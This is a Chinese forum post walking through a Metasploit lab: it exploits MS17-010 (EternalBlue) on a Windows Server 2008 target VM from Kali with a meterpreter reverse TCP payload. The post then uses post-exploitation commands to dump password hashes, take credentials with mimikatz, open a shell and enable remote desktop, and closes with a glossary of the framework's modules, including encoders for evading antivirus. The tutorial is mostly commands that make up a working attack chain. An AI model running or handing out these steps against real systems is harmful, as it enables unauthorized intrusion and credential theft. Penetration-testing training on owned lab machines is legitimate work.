xiaobai007 发表于 2021-12-23 16:01:09

MSF - 拿下目标服务器最高权限


1.        我们准备一台靶机(被攻击机器)   
Windows server 2008 edition 64位(32位靶机系统需要下载对应32位的攻击模块)
2.        我们在准备一台攻击机 kali 2021版本
3.        在靶机里面1.关闭服务器,2.开通445端口,查看靶机ip地址

4.        在攻击机查看ip地址,然后靶机和被攻击机相互ping网络看看通不通,保证网络通不丢包。


5.        开启pg数据库服务 service postgresql start

6.        初始化 msfdb数据库msfdb init

7.        开启msfconsole

每次开启 logo随机不一样
8.        查看连接数据库状态 db_status

9.        我们知道永恒之蓝漏洞编号ms17-010,我们就搜索一下 search ms17

10.        我们以上面序号0,名称exploit/windows/smb/ms17_010_eternalblue 攻击模块为例子,使用模块指令 use 序号/use 名称。use auxiliary/scanner/smb/smb_ms17_010

或者

11.        然后看一下设置,看看设置需要配置那些信息 options

我们看请求必写的yes对应参数
Rhots 是目前主机,我们设置 setrhost 192.168.167

Rport 端口 set rport 445
12.        设置payload    set payload windows/x64/meterpreter/reverse_tcp


13.        配置完run

如果跑失败了,指令和配置没有问题就多跑两遍

Fail失败后,ctl+c回到上一级继续run 出现win即可。注意靶机防火墙不能开启负责失败。
14.        简单的指令
查看用户权限: meterpreter> getuid
获取hash密码: meterpreter> hashdump
上传文件: meterpreter> upload 文件名
执行文件: meterpreter> execute -fnotepad.exe
获取屏幕截图:meterpreter>screenshot
获取shell:meterpreter>shell
15.        加载猕猴桃 load mimikatz

Mf6版本使用 wiki指令
16.        使用 creds_all

17.        我们可以开通远程桌面 run post/windows/manage/enable_rdp

18.        登录

19.        比如我们执行打开计算器或者记事本
Execute -f calc.txt/notepad.exe




综合框架
Auxiliary         辅助模块          为渗透测试信息搜集提供了大量的辅助模块支持

Exploits        攻击模块          利用发现的安全漏洞或配置弱点对远程目标系统 进行攻击,从而获得对远程目标系统访问权的代码组件。

Payload        攻击载荷模块           攻击成功后促使靶机运行的一段植入代码

Post                后渗透攻击模块收集更多信息或进一步访问被利用的目标系统

Encoders   编码模块      将攻击载荷进行编码,来绕过防护软件拦截
其他指令
简单好用的帮助指令
help/?             帮助菜单
exit                退出MSF控制台
Back         返回上一级
info                显示一个或者多个模块的信息

show                显示所给类型的模块

background   将当前操作在后台运行

use                 使用所选择的模块
set                设置选项

unset                取消设置的选项
session        会话

页: [1]
查看完整版本: MSF - 拿下目标服务器最高权限